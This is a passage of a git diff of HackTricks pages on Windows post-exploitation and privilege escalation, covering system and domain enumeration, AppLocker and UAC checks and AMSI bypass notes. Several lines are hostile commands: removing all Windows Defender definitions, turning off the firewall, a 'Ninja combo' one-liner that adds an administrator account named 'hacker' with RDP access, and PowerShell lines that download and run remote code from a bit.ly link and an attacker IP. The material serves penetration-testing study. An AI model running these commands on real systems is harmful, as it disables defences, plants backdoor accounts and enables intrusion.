More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
## Security Support Provider Interface (SSPI) ## Security Support Provider Interface (SSPI)
Is the API that can be use to authenticate users. Is the API that can be use to authenticate users.

View file

@ -20,8 +20,13 @@
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname hostname
DRIVERQUERY #3rd party driver vulnerable? DRIVERQUERY #3rd party driver vulnerable?
``` ```
@ -54,14 +59,7 @@ nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
wmic logicaldisk get caption,description,providername wmic logicaldisk get caption,description,providername
``` ```
### AV ### [Defender](authentication-credentials-uac-and-efs.md#defender)
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
### Recycle Bin ### Recycle Bin
@ -88,23 +86,48 @@ reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
## Domain info ## Domain info
```bash ```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller set logonserver #Get name of the domain controller
set log #Get name of the domain controller set log #Get name of the domain controller
net groups /domain #List of domain groups gpresult /V # Get current policy applied
net group "domain computers" /domain #List of PCs connected to the domain wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers # Users
net group "Domain Controllers" /domain #List PC accounts of domains controllers dsquery user #Get all users
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the grup "Domain Admins" is included here)
net user /domain #List all users of the domain net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy net accounts /domain #Password and lockout policy
nltest /domain_trust #Mapping of the trust relationships. wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
gpresult /V # Get current policy applied wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trust #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
``` ```
### Logs & Events ### Logs & Events
@ -119,15 +142,21 @@ wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654
### Users ### Users
```bash ```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges whoami /priv #Show only privileges
# Local users
net users #All users net users #All users
dir /b /ad "C:\Users" dir /b /ad "C:\Users"
net user %username% #Info about a user (me) net user %username% #Info about a user (me)
net accounts #Information about password requirements net accounts #Information about password requirements
qwinsta #Anyone else logged in? wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network) #Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
@ -212,23 +241,28 @@ NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off netsh firewall set opmode disable #Turn Off
::How to open ports #How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138 netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139 netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop" netsh firewall add portopening TCP 3389 "Remote Desktop"
::Enable Remote Desktop #Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop" netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed ::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed ::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed ::net start Termservice #I found that this line is not needed
::Enable Remote assistance: #Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable netsh firewall set service remoteadmin enable
::Ninja combo (New Admin User, RDP + Rassistance + Firewall allow) #Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password) ::Connect to RDP (using hash or password)

View file

@ -95,31 +95,7 @@ kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8
PS> powershell -EncodedCommand <Base64> PS> powershell -EncodedCommand <Base64>
``` ```
## Execution Policy ## [Execution Policy](../authentication-credentials-uac-and-efs.md#ps-execution-policy)
By default it is set to **restricted.** Main ways to bypass this policy:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
3º Read and Exec
Get-Content .runme.ps1 | Invoke-Expression
4º Use other execution policy
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
5º Change users execution policy
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
6º Change execution policy for this session
Set-ExecutionPolicy Bypass -Scope Process
7º Download and execute:
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
8º Use command switch
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
## [Constrained language](broken-reference) ## [Constrained language](broken-reference)
@ -173,7 +149,7 @@ ValueData : 0
### AMSI bypass ### AMSI bypass
\*\* `amsi.dll`\*\* is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything. &#x20;** `amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
Therefore, the goal of the AMSI bypasses you will are are to **overwrite the instructions of that DLL in memory to make the detection useless**. Therefore, the goal of the AMSI bypasses you will are are to **overwrite the instructions of that DLL in memory to make the detection useless**.

View file

@ -40,14 +40,6 @@
[integrity-levels.md](integrity-levels.md) [integrity-levels.md](integrity-levels.md)
{% endcontent-ref %} {% endcontent-ref %}
## Windows Security Controls
There are different things in Windows that could **prevent you from enumerating the system**, run executables or even **detect your activities**. You should **read** the following **page** and **enumerate** all these **defenses** **mechanisms** before starting the privilege escalation enumeration:
{% content-ref url="../authentication-credentials-uac-and-efs.md" %}
[authentication-credentials-uac-and-efs.md](../authentication-credentials-uac-and-efs.md)
{% endcontent-ref %}
## System Info ## System Info
### Version info enumeration ### Version info enumeration
@ -355,6 +347,54 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
``` ```
### AV
Check is there is any anti virus running:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
Get-MpComputerStatus
```
### AppLocker Policy
Check which files/extensions are blacklisted/whitelisted.
```powershell
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`.
**Useful Writable folders to bypass AppLocker Policy**
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
**Poorly written rules could also be bypassed**, like `<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`, you can create a folder called allowed anywhere and it will be allowed.
**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker.
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
### UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\
[**More information about UAC here**](../authentication-credentials-uac-and-efs.md#uac).
```
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
```
## Users & Groups ## Users & Groups
### Enumerate Users & Groups ### Enumerate Users & Groups
@ -1431,17 +1471,7 @@ while($true)
## From Administrator Medium to High Integrity Level / UAC Bypass ## From Administrator Medium to High Integrity Level / UAC Bypass
Read this to **learn about Integrity Levels**: [**Read this to learn about Integrity Levels**](integrity-levels.md) **and** [**this to learn what is UAC**](../authentication-credentials-uac-and-efs.md#uac)**, then read how to**[ **bypass it**](../authentication-credentials-uac-and-efs.md#uac)**.**
{% content-ref url="integrity-levels.md" %}
[integrity-levels.md](integrity-levels.md)
{% endcontent-ref %}
Then **read this to learn about UAC and UAC bypasses:**
{% content-ref url="../windows-security-controls/uac-user-account-control.md" %}
[uac-user-account-control.md](../windows-security-controls/uac-user-account-control.md)
{% endcontent-ref %}
## **From High Integrity to System** ## **From High Integrity to System**

View file

@ -4,19 +4,25 @@
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original"> <img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">
If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %} {% embed url="https://www.stmcyber.com/careers" %}
{% endhint %}
## Definition ## Definition
@ -217,20 +223,26 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
} }
``` ```
{% hint style="danger" %}
<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original"> <img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="original">
If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %} {% embed url="https://www.stmcyber.com/careers" %}
{% endhint %}
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>